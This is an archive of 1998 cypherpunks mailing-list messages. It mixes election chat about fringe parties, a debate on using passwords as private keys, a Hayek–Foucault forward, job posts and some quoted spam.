> evils. Perhaps the lesser of two evils in this corrupted, Constitutionaly
> bereft system is *NOT TO PARTICIPATE*. Sine it obviously doesn't matter who
> wins, since the mighty spectre of compromise will dilute any real difference
> into a verbal shell game devoid of meaning. Maby deToquville (sorry for
> spelling - early morning) was right about mediocrity being the result of
> democracy, except in one fine point. It won't be the people as a whole but
> rather those who are too stupid and wedded to outmoded ideals to change. The
> social and political dinosaurs if you will.


Not voting tells the current politicians that you don't care
what they do to you.  They'd be happier if only 5% of the electorate
bothered to vote- that's fewer people to market to.

If you don't like the Republicrats in office, then vote for
what the media denigrates as a 'fringe cantidate'.  If they
lose, which is likely because Americans tend to want to vote
for the winner, then you'll be satisfied because you voted
against the idiot in office.  If they happen to win, then
you'll either get someone wiht some new ideas which (hopefully) you
agree with, or someone so seriously wierd that they paralyze
government for their entire term. 

Here in California we have Green, Libertarian, Peace and Freedom,
Reform and Natural Law candidates for almost all the state positions.
The Natural Law people are so wierd that it's very tempting to
vote for them, here's a sample:

Jane Ann Bialosky, Natural Law candidate for Secretary of State:
"My ideal is to bring fullfillment to the electoral idea, a wise electorate.
Government is the reflection of collective conciousness....
Our government should sustain the influence of harmony, positivity, wholeness,
in which no one can go wrong and everyone will spontaneously be right...
The government of nature governs from the holistic nasis of creation
according to the principle of least action.... Everything must be held up
by natural law.

Another Natural Law candidate for state Controller:
"My vision is for prevention-oriented government, conflict-free politics
and proven solutions to America's economic problems by cutting taxes deeply
abd responsibly while simultaneously balancing the budget through
cost-effective solutions to America's problems, rather than by cutting
essential services."


I was thinking as I read the voter pamphlet that an Absurdist party
would be quite amusing and would point out the silliness of the
current politicians.  But I don't think I could come up with anything as
wacky as the Natural Law people can.


> Maby the polls where drunk dwarves win over 'serious' candidates is actualy
> demonstrating the absurdity of those who insist their issue are serious.

That's my point.  Absurdisim sends a much stronger message
than just not voting.  Voting for serious 'fringe' candidates
(i.e. Libertarians) also sends a message.  Not voting just
says "I don't care what you do to me".



Of course the whole thing _could_ be rigged- 
last night the ABC web site had pages up with _today's_
voting results, with 100% of the "precincts reporting".

 http://www.abcnews.com/sections/us/elections98/results/senate.html
 http://www.abcnews.com/sections/us/elections98/results/governors.html
 http://www.abcnews.com/sections/us/elections98/results/issues.html

They're not up now, but I managed to get a copy of the senate "results"
yesterday (10/2) at 18:40 PST.  It'll be interesting to see how well
they match the "results" from today. 

A copy of the page I saved is at www.lne.com/ericm/senate.html



-- 
Eric Murray          N*Able Technologies                    www.nabletech.com
(email:  ericm  at the sites lne.com or nabletech.com)     PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 4 Nov 1998 17:25:16 +0800
To: coderpunks@toad.com
Subject: knapsack...
Message-ID: <Pine.GSO.3.96.981103113606.21393A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Could someone tell(give) me where to get a source code
for the knapsack algo (w/ backtracking).

I am going to "parallelize" it.

(suggestions/comments ?)


Thank you.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 4 Nov 1998 04:07:18 +0800
To: ericm@lne.com>
Subject: RE: VANGUARD:  An Election About Nothing? (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8561@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray wrote:

> Not voting tells the current politicians that you
> don't care what they do to you.  They'd be happier 
> if only % of the electorate bothered to vote that's 
> fewer people to market to.

Yep  look at it as a market. People who don't or can't vote don't count;
jist as people who don't or can't pay don't count in a shop.  If you
vote  or at least if you give a credible threat of possibly voting  they
might notice. Otherwise you are invisible. 

> I was thinking as I read the voter pamphlet that an
> Absurdist party would be quite amusing and would 
> point out the silliness of the current politicians. 
>  But I don't think I could come up with anything as
> wacky as the Natural Law people can.


We used to get "Natural Law" candidates  in UK as well. Not so many last
time round, maybe they finally spent George Harrison's money.   The best
track-record for an Absurdist Party in  this country is the Monster
Raving Looney Party, which used to be mostly Screaming Lord Sutch who
stood for parliament again and again but has recently taken on some sort
of continuing existence (see http://www.surfbaud.co.uk/loony/) and even
has a few town councillors in various places.

Sutch may well have almost invented an electoral version of the
cypherpunk  assasination prototcol - bookies were quoting odds of 15
million to one against him winning a seat once and he pointed out that
if he could find a way to pay voters off anonymously he could bet on
himself and bribe the electorate with his winnings...   I think the odds
fell after that.  Of course the possibility of easy  anonymous bribery
makes traditional electoral law much, much harder to enforce  (see, this
is relevant to Cypherpunks). 

There are some fun looking parties around.  The line up for the UK
General Election on the Glorious First of May was (in order of number of
seats gained):

Labour Party, Conservative Party,   Liberals, Ulster Unionist Party,
Scottish Nationalist Party, Plaid Cymru,  Social Democratic and Labour
Party,  Democratic Unionist,  Sinn Fein,  United Kingdom Unionist,
Madam Speaker Seeking Reelection and  Martin Bell standing as an
independent; all of whom won something. 

And

Alliance Party of Northern Ireland,  British National Party, Rainbow
Dream Ticket Party,  Green Party, 
Liberal Party, Mebyon Kernow,Monster Raving Loony Party,National
Democrats, Northern Ireland Women's Coalition, Natural Law Party ,
ProLife Alliance ,Popular Unionist Party,  Referendum Party  
Socialist Labour Party, Socialist Party,  Scottish Social Alliance,  UK
Independence Party,  Workers Party, 
Workers Revolutionary Party; who didn't win anything but all seem to
have some sort of continuing existence as parties

And 

Anti Sleaze/Corruption,   AntiConservative, Sportsman's Alliance: Anyone
But Mellor, Lord Byro versus the Scallywag Tories,  AntiPoliticians,
Antimajority Democracy, Independent Democracy Means Consulting the
People, People in Slough Shunning Useless Politicians, Common Sense Sick
of Politicians Party, None of the Above, Drugs  Hemp/Cannabis Platforms,
New Millenium, New Way, Hemp Candidate, Hemp Coalition, Legalise
Cannabis Party, Ind AE  Independent Anti Europe, British Home Rule ,
British Isles People First,
Independent Conservative,   Independant Christian, Christian Party,
Christian Nationalist, Christian Democrat, Christian Unity,  Independent
Communist,  Communist Party of Britain, Communist League,  Independent
British Democratic Party, Social Democrat, English Democratic Party,
Rennaisence Democrat, Independent Democrat,  Freedom/Justice/Rights
Platform,   Justice Party, Freedom Party, Justice and Renewal
Independent Party, Pacifist for Peace, Justice, Cooperation,
Environment, Charter for Basic Rights, Fellowship Party for Peace and
Justice, Human Rights ', British Freedom and Individual Rights, Far
Left,   Radical Alternative, Building a Fair Society, Full Employment
Party, Socialist Party of Great Britain, Socialist Equality Party,
Independent Far Right, National Front, Third Way, Independent Green,
Scrapit Stop Avon Ring Road, Newbury Bypass Stop Construction Now,
Independent Liberal Democrat,  Top Choice Liberal Democrat, Independent
Labour,  
and Local Independent; who all seem to have been invented for the
occasion.

Make up your mind as to which, if any, are absurdist. I suspect none of
them bribed the voters much.

Roll on the transferable vote!

Ken Brown & the Disclaimers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: da5id@simons-rock.edu
Date: Wed, 4 Nov 1998 02:21:38 +0800
To: cypherpunks@Algebra.COM
Subject: [Fwd: ...prolonged, unintentional and inadvertent...]
Message-ID: <363F3CED.A5A4F1DF@simons-rock.edu>
MIME-Version: 1.0
Content-Type: text/plain

 

To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: ...prolonged, unintentional and inadvertent...
From: glen mccready <glen@qnx.com>
Date: Tue, 03 Nov 1998 11:30:26 -0500
Delivered-To: da5id@simons-rock.edu
Resent-Date: Tue, 3 Nov 1998 11:32:36 -0500
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
Resent-Message-ID: <"CF3sc1.0.UA3.D0pFs"@shell>
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: Nev Dull <nev@bostic.com>
Forwarded-by: "Geoffrey S. Knauth" <gknauth@bbn.com>
Forwarded-by: Tom Schuneman <elf@wavemark.com>

PARIS (Reuters) - Electronic trading may be cheap, but leaning on the
keyboard can be costly. A mystery plunge in the value of French 10-year
bond futures on July 23 was triggered by a bank trader at Salomon Brothers
in London who accidentally and repeatedly hit the "Instant Sell" button,
investigators said Thursday.

A wave of 145 separate sell orders sent the price diving on electronic
screens.

"The disputed trades arose as a result of the prolonged, unintentional
and inadvertent operation of the 'Instant Sell' key," said an
investigation by computer software firm Cap Gemini and security group
Kroll Associates.

Salomon Brothers declined to comment on any losses.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 4 Nov 1998 04:07:51 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: VANGUARD:  An Election About Nothing? (fwd)
Message-ID: <199811031855.MAA05131@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Murray <ericm@lne.com>
> Subject: Re: VANGUARD:  An Election About Nothing? (fwd)
> Date: Tue, 3 Nov 1998 09:00:34 -0800 (PST)

> Not voting tells the current politicians that you don't care
> what they do to you.  They'd be happier if only 5% of the electorate
> bothered to vote- that's fewer people to market to.

That should set off flags for truly honest politicians (talk about a non
sequeter).

> If you don't like the Republicrats in office, then vote for
> what the media denigrates as a 'fringe cantidate'.  If they
> lose, which is likely because Americans tend to want to vote
> for the winner, then you'll be satisfied because you voted
> against the idiot in office.  If they happen to win, then
> you'll either get someone wiht some new ideas which (hopefully) you
> agree with, or someone so seriously wierd that they paralyze
> government for their entire term. 

This of course assumes that there is some faith in the system.

> The Natural Law people are so wierd that it's very tempting to

Weird? You're talking to somebody who lives in Austin, Tx. The capital of
weird amond weird....;)

But the point isn't to vote for just anybody. I keep having this echo of
Federalist #5 (I think that's the one about political parties) going through
my head. The problem with our system is that we need a more representative
form of government. It shouldn't be simply a football game (which leads to a
related but deep issue about American psychology itself) but a fair and
honest representation of the peoples desire. The only things I can find that
would make such '3rd party' strategies work is if the representation was
done by percentage as in Englands parliament.

> That's my point.  Absurdisim sends a much stronger message
> than just not voting.  Voting for serious 'fringe' candidates
> (i.e. Libertarians) also sends a message.  Not voting just
> says "I don't care what you do to me".

I'll think about this one. Several points come to mind and I'm not sure
how to express them at this point. The point I can address is that it isn't
that people voted for a drunk dwarve. It was the issue was so trivial or
irrelevant that it didn't matter who goes in there, it simply doesn't
matter. In that case the only answer is to opt out and spend ones time
dealing with the issues and problems that do matter.

The question is deeper than simply participation, it's addresses the entire
point of the system that needs our participation in the first place.

> last night the ABC web site had pages up with _today's_
> voting results, with 100% of the "precincts reporting".

I'd guess they were testing.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 4 Nov 1998 04:32:08 +0800
To: "Brown, R Ken" <nobody@replay.com>
Subject: RE: airline id
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F853F@MSX11002>
Message-ID: <v0401170db264fcbd0937@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:46 AM -0500 10/29/98, Brown, R Ken wrote:
>problem. On trains, unlike planes, you keep your luggage with you.
>
>Also people *like* trains. They are cute. Even in America you have
>hordes of trainspotters and steam enthusiasts and model-builders and all
>the rest. It always amazes me that bookshops have more shelves of
>hobbyist books about trains than about cars, but only about 15% of the
>population regularly travel by train and about 60% by car. (In England -
>I guess in the USA that's more like 5% and 85% - and before you say that

	That actually may be the reason. I have traveled a good deal on
both trains, by Auto, and by bicycle, and well, Trains suck. Cars suck
slightly less (execpt in a few cases).

	It is easiest to get romantic about something you don't have to
fight with on a regular basis.

Ken Brown
>
>(who prefers bicycles to trains but had to use the train to get to work
>today because  of a broken spoke he is incapable of fixing. He only does
>software)

	I have 3 bikes. Hell, a spare bike is cheaper than a spare tire.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 4 Nov 1998 04:52:57 +0800
To: Adam Back <bill.stewart@pobox.com
Subject: Re: don't use passwords as private keys (was Re: Using a passwordas a private key.)
In-Reply-To: <3.0.5.32.19981028012129.008334d0@idiom.com>
Message-ID: <v0401170eb2650185288c@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:20 PM -0500 10/29/98, Adam Back wrote:
>Some people have been talking about using passwords as private keys.
>(By using the passphrase as seed material for regenerating the private
>and public key).
>
>I don't think this is a good idea.
>
>You can't forget passphrases.  You can destroy private key files.
>

	Yes, you can. I had an art director forget his 4 days running,
AFTER LUNCH. He remembered it in the morning, but after lunch he couldn't.

	It wasn't a "passphrase" either, it was a _very_ weak password.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 4 Nov 1998 07:58:22 +0800
To: Eric Murray <ravage@einstein.ssz.com
Subject: Re: VANGUARD:  An Election About Nothing? (fwd)
In-Reply-To: <199811031321.HAA04373@einstein.ssz.com>
Message-ID: <3.0.5.32.19981103151311.00984100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:00 AM 11/3/98 -0800, Eric Murray wrote:
>The Natural Law people are so wierd that it's very tempting to vote for them,

One reason their rhetoric looks so weird is because it's avoiding
coming straight out and saying "Our plan for fixing society is to have 
the government fund teaching of Transcendental Meditation(r) to everybody,
and once everybody is doing TM, they'll all be healthier, better behaved,
and will do things in accordance with The Laws Of Nature As Taught By
the Maharishi Mahesh Yogi, so the problems of the world will all fix themselves."
Meanwhile, of course, they describe their national health plans as using
"Proven Scientific Principles" (TM having been proven to fix everything)
and their education plans using similar obfuscatory rhetoric.
(On the other hand, I haven't heard them saying that the TM-Siddhi program
will let them replace the Air Force with levitation yet;
they tend to take the view that calmness and niceness will scientifically
reduce the need to shoot people, which I can't fault them for too much...)

It's basically a wimpier version of traditional Western moral reformers 
pushing the view that if government gets rid of Sin, society will work better,
but getting rid of ignorance is usually a "kinder, gentler" process,
not that you want to tell the ignorant what you're doing,
because they may think that offering fruit and flowers to a guru's picture
and chanting the name of a fire-god while breathing quietly
is not only a strange way to fix ignorance but is an inappropriate thing 
for governments to spend their money on, especially in the name of Science.

Most of the Natural Law Party candidates I've talked to, except when
they're on direct meditation-revenue-enhancement topics, tend to be
reasonable folks, somewhere in the liberal-to-libertarian range,
thinking the government should mostly let people do what they want,
which will naturally lead to calmness and niceness as they follow 
natural law, and a lot of the TM folks, especially around
Maharishi University in Iowa, have gone into business for themselves,
so they prefer lower government interference and red tape.

On the other hand, like any small party trying to get enough candidates
to run full slates for office, some of their folks really are flakes :-)
I like to believe that Libertarians do better on that score,
but we've got our share as well, and the only real way out of it
is to grow large enough that the supply of people willing to run
includes enough competent people.

On the other hand, it's still tempting to see about putting Frank Zappa
on the ballot.  He is a bit metabolically challenged these days,
but it wouldn't bother him much, and he's still be a better candidate
than most live Democrats or Republicans.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: service@angelfire.com
Date: Wed, 4 Nov 1998 07:58:22 +0800
To: cypherpunks@toad.com
Subject: Seeking Commission Based Sales Representatives and Distributors
Message-ID: <199811032324.PAA12558@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi 

We are seeking commission-based sales representatives and distributors
in your geographic market to spearhead the national roll-out for our 
Consumer Smart Product line. 

Whether you are a student or a senior citizen,
everyone is qualified to earn extra income within our company. 

	Could you use extra income?
       	Are you tired of get rich schemes?

If you can answer YES to these questions, then this is the perfect 
opportunity for you.

	This is not a pyramid or get rich quick scheme.
       	This is a serious, legitmate business opportunity.

We offer Consumer Smart Products at prices everyone can afford!  
Our products are useful for everyone and they make perfect gifts! 

All our products emphasize "Quality, Function and Value" 

For additional information, please reply to this email with more info 
in your subject heading. Only serious applicants need apply.

Thank You







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Poldre <jp@pld.ttu.ee>
Date: Wed, 4 Nov 1998 01:07:56 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: hardware sharing question
In-Reply-To: <199811020422.XAA11460@cti06.citenet.net>
Message-ID: <Pine.SV4.3.96.981103173307.19127E-100000@pitsa.pldsise>
MIME-Version: 1.0
Content-Type: text/plain




Dear C'punks,

There are many different hardware accelerator devices available for
speeding up the  modmul operation - The nFast and FastMap to name  a few.
I am about to build a new one. This unit should be: 

1. Expandable
    A. No harm if exponent is larger than N bits - just slower
    B. As much parralel calculations as possible - add ALU and 
       get faster results 
2. Low cost- keep only the heavy iron in the card - all other is ok 
   to do using host CPU.

This should also enable to build the device for several applications -
After all I want only to replace a call to some mathemathical subroutine.


To realize it the Residue Number System, with some additional memory seems
like a good choiche. The system will eventually consist of a card with
slots for addtional ALU and RAM modules. You can do away with only one ALU
- tha base kit, but it will consume bus bandwidth. Add memory and you are
free from that limitation. Slow? Add ALU units. 

But interestingly my main problem is not about cryptography :) I would
like to know, if there are possible other places, where integer
arithmetics could be used. Maybe A world would be a better place with fast
matrix multiplication?

So people. I would very much appreciate, if you could tell me about the
ways we could use this integer calculator for other applications as well.

I will be using RNS, what gives us a lot of multiplications/additions in
parralel. 

Thank you,

Jyri Poldre,
Tallinn Technical University.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 4 Nov 1998 07:24:32 +0800
To: petro@playboy.com
Subject: Re: don't use passwords as private keys (was Re: Using a passwordas a private key.)
In-Reply-To: <v0401170eb2650185288c@[206.189.103.230]>
Message-ID: <199811032218.WAA22735@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Petro <petro@playboy.com> writes:
> >You can't forget passphrases.  You can destroy private key files.
> 
> 	Yes, you can. I had an art director forget his 4 days running,
> AFTER LUNCH. He remembered it in the morning, but after lunch he couldn't.

With the kind of "memory aid" we were talking about here (legal
threat, 1 years imprisonment for contempt to aid memory, perhaps
torture) he might just have remembered it.  If he didn't he'd likely
get a year or so to try remember it in prison on contempt charges for
not handing it over.

Deleting keys on the other hand, contempt would be a waste of time,
you're never going to remember what you don't know, and they ought to
convincable of this if you can show the software documentation
describing forward secret key material deletion.

> 	It wasn't a "passphrase" either, it was a _very_ weak password.

Also note that it is not necessary to remember the password precisely,
just narrow the search space down to provide a viable dictionary
attack of 56 bits or whatever.

The art directors password sounds like it was already below that.

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 4 Nov 1998 06:45:38 +0800
To: ignition-point@majordomo.pobox.com
Subject: JIM MARTIN---NC Supreme Court (fwd)
Message-ID: <199811032150.WAA15132@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



This spam was received earlier today. One has to wonder just how stupid
this guy is.

Hint: I live at least a thousand miles from North Carolina. This guy is
running for a position as judge, but thinks that it is more important to
tell people about how many kids he has as opposed to his actual
qualifications for the office.

He might also want to learn how to use English, that people in the other 49
states cannot vote for or against him, and what the term "theft of service"
means before he attempts to occupy such an office.

---------- Forwarded message ----------
From: Ineedyourhelp@yourvote.com
Subject: JIM MARTIN---NC Supreme Court
Date: Mon, 2 Nov 1998 09:42:32


                           JIM MARTIN
                         NC Supreme Court

My Friend:

I needy Your Help when you vote on Tuesday.  Your vote for me
to represent you on the NC Supreme Court would really be
appreciated by me.

I'm not a politican.  I have a Family, 3 kids in college and
I can and will make a difference if you give me the chance
to work for you..

When elected, I promise you that my Door will always be open
TO YOU.

I Thank You,

Jim Martin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>Lorrie Faith Cranor <lorrie@research.att.com>
Date: Thu, 5 Nov 1998 06:27:05 +0800
To: cypherpunks@cyberpass.net
Subject: Programmer Needed for Privacy Tool Implementation ProjectProgrammer Needed for Privacy Tool Implementation Project
Message-ID: <199811042148.WAA04222@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



As the World Wide Web Consortium's Platform for Privacy Preferences
Project (P3P) specification is nearing completion, it's time to
start working on P3P implementations.

I have an immediate opening for a java programming contractor to
implement a P3P user agent as a client-side proxy. For details on
P3P see http://www.w3.org/p3p/  This is an excellent opportunity
for a programmer who wants to help make it easier for people to
maintain their privacy online.

An outstanding candidate for this position would have:
- several years of programming experience, including project design 
  experience
- experience with browser plugg-ins, Web proxy servers, or Web clients
  (or at least some familiarity with the HTTP protocol)
- Windows GUI development experience
- user interface design experience
- familiarity with XML

I'm looking for someone who can start ASAP, preferably in the next
month.  This project is expected to last 3 to 6 months, most likely
6 months.  We would prefer someone who can work on site at the AT&T
Labs-Research Shannon Laboratory in Florham Park, NJ, but will
consider outstanding applicants who would prefer to work remotely.
Florham Park is in a nice suburban area less than an hour from
midtown Manhattan.

Please email lorrie@research.att.com for more information or to
apply.

--
Lorrie Faith Cranor                    lorrie@research.att.com
AT&T Labs-Research                                973-360-8607
180 Park Ave. Room A241                       FAX 973-360-8970
Florham Park, NJ 07932    http://www.research.att.com/~lorrie/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 4 Nov 1998 09:52:49 +0800
To: "Robert A. Costner" <pooh@efga.org>
Subject: Re: MIB Subpoenas
In-Reply-To: <3.0.3.32.19981028234903.034b1ad0@rboc.net>
Message-ID: <199811040107.CAA03703@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Actually I was thinking of trying to get ahold of Jim Bell and get
> permission to publish Assassination Politics in Hardback along with other
> info.

btw: Winn Schwartau (infowar.com) has published the AP essay in a book.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Wed, 4 Nov 1998 12:12:04 +0800
To: cypherpunks@cyberpass.net
Subject: FUD vs LINUX
Message-ID: <d1bf2379b8ffd1cfb36f0c958f9a1dbe@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



MICROSOFT EXECS WORRY ABOUT FREE SOFTWARE MOVEMENT


An internal Microsoft memo written by one of that company's software
engineers indicates that Microsoft is concerned with developing strategies
for competing against free programs that have been gaining popularity with
software developers, such as the operating system Linux.  The memorandum
warns that the usual Microsoft marketing strategy known as FUD (an acronym
for fear, uncertainty, and doubt) won't work against developers of free
software, who are part of the O.S.S. (open-source software) movement that
makes source code readily available to anyone for improvement and testing.
The memo (http://www.opensource.org/halloween.html) says:  "The ability of
the O.S.S. process to collect and harness the collective I.Q. of thousands
of individuals across the Internet is simply amazing.  More importantly,
O.S.S. evangelization scales with the size of the Internet much faster than
our own evangelization efforts appear to scale."  


(New York Times 3 Nov 98)










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wabe <wabe@home.com>
Date: Wed, 4 Nov 1998 17:47:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re: JIM MARTIN---NC Supreme Court (fwd)
In-Reply-To: <199811032150.WAA15132@replay.com>
Message-ID: <364045D4.E486986A@home.com>
MIME-Version: 1.0
Content-Type: text/plain



He's probably better qualified than the people who get elected.
-wabe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 4 Nov 1998 23:05:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Hayek and Foucault
Message-ID: <v04020a2ab265ff7124fd@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Wed, 4 Nov 1998 04:27:52 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Stephen Carson <SWCarson@AOL.COM>
Subject:      Re: Hayek and Foucault
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

     Clearly, Hayek's analysis of power & the state has been superseded
by a far more nuanced view.  But, just for old time's sake, I would like
to try arguing that Hayek's (and, in fact, the Old Whig/classical
liberal) perspective may still have something to offer us that these new
views, as explicated by Williams & Davis, don't seem to have.
     Please chalk up unrelated attempts to defend Hayek to my current
fascination with "pietas", now that I've finally figured out what my
Latin teacher meant by that.

Julietwill@AOL.COM (Juliet Williams) wrote:
>given everything Hayek knew about the perils facing the planning state, he
>nonetheless feared it.  Hayek's own arguments about the obstacles to
>planning and centralizing power should have suggested to him that the real
>danger in the future lies not with a centralized state (which is doomed to
>fail) but rather with a government that recognizes the need to
>decentralize its power in order to maintain hegemony.  Then Hayek might
>have understood that a state which dissipates and, hence, masks its power
>can threaten liberty equally if not more so than a state which tries to
>maximize its direct control.  Hayek was perfectly positioned to
>understand, as Foucault did, that total state poses much less of a threat
>in these times than does the post-modern one in which state power is so
>thoroughly diffused as to be unrecognizable.

     Perhaps I'm thinking about the wrong time horizon, but it seems to
me that the 170 million or so that were marched out to the killing fields
in this century might have had some not entirely irrelevant fears of the
"planning state".  Certainly, despite my understanding of the inherent
instability of the Total State, I thank God regularly that the US hasn't
yet gone through that awkward transition period between the birth of the
Total State & its demise.
     Foucault is probably correct that we are beyond the centralized
state.  But I can't help recalling to mind my re-reading the other night
of the first chapter of R. J. Rummel's _Death By Government_ in which he
details the numerous slaughters (most by centralized states) that have
occurred throughout history prior to the 20th century.  I hope very much
my pessimism about human nature will be disproven, but I think I'll keep
my eyes open just in case.

>Foucault thus offers us something Hayek does not, namely, an imperative to
>resist power.  Hayek is primarily concerned not with promoting resistance,
>but rather with preventing the need for it in the first place.  It is true
>that Hayek concedes a place for participation by his admission that
>democracy is one of the most important safeguards of freedom (LLL3, 5).
>  But Hayek hardly offers a resounding endorsement of participatory
>politics.  In his words, democracy is one of those paramount though
>negative values, comparable to sanitary precautions against the plague.

     Given all this I'm not quite sure what to make of Hayek's personal
efforts, like the Mont Pelerin Society, or of the rumours that Hayek's
writings have had & continue to have an influence on those suffering
under totalitarianism & looking for a sign of hope.
     To be sure, this may be very distant from the sort of participatory
politics that Foucault understands to be effective, but it seems unfair
to say that Hayek had no strategy of resistance at all.
     My own reading of Hayek is of a man who was (since roughly 1922)
engaged in a lifelong resistance against state power.  Admittedly, his
strategy may seem extremely subtle & long-term, but I might even go so
far as to claim that his strategy has already had some effectiveness in
its own small way... And that his intention was that its greatest impact
wouldn't hit until well after his death.


daviserik@HOTMAIL.COM (Erik Davis) wrote:
>Liberals in general tend to limit discussion of "power" to discussion of
>the state, and perhaps Hayek often did the same.

     One might even say that, in the context of a classical liberal
political discussion, the term "power" is short for "state power", (or,
perhaps, coercive power).

>This will seem paradoxical to a liberal--and even more so to a
>conservative (esp. those of Hobbesian persuasion)--because if the rule
>of law must ultimately be "enforced" endogenously then this means
>that--if it were ever to be completely upheld--one could say (1) that
>the state will cease to exist [because there would not be a need for
>exogenous enforcement of rules] or (2) that the "state" will be ALL
>PERVASIVE [because every agent is committed to the rules].  (Certainly,
>just what is "endogenous" and what is "exogenous" should itself be
>brought into question--that would be Foucault's point, no?).  The
>liberal will say (1), the postmodernist will say (2).

     It's probably just six of one, half dozen of another, as you imply.
Though it occurs to me that Rummel's particular concern about the state,
(that it will slaughter its citizens and whoever else comes under its
power), would be allayed in the situation described.  So in this
particular sense, (1) might be the most useful claim to be made.
     It further occurs to me that if Rummel is right, that a society in
which the rule of law is diffused & widely practiced will not kill its
citizens, then would could conjecture that such a society might even
afford more liberties than just to retain one's life.

>If we read Hayek with (2) in mind, Hayek does at times seem to
>politicize EVERYTHING.  For example, in his "Why I am Not a
>Conservative", the Party of Life is not tied to a state.
>
>I wanted to emphasize this in my earlier post (in reply to Gus DiZerega
>and Stephen Carson) by pointing out the analogies between common law
>(tied to state action) and custom (not necessarily tied to the state).
>Common law is a system of precedents which determines where and when
>force can be legitimately applied; customs ("rituals" [INSTITUTIONS!
>{see below}]) function in a completely analogous way.  The POLITICAL
>character of these customs (as, in one form, a "perverse system of
>rituals")--and of challenges to them--is precisely the argument of
>Vaclav Havel's THE POWER OF THE POWERLESS.

     I think this is an excellent point.  Perhaps it's just taste, but
I'm a bit bothered by speaking of the political character of customs.
Certainly customs, (and non-state institutions, like the family &
friendship), have political implications, but to talk about their
political character seems to me to let politics eat too much up.  And I
think we've had quite enough of that.

Stephen W. Carson   <mailto:SWCarson@aol.com>

"Premature optimization is the root of all evil" -Donald Knuth

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
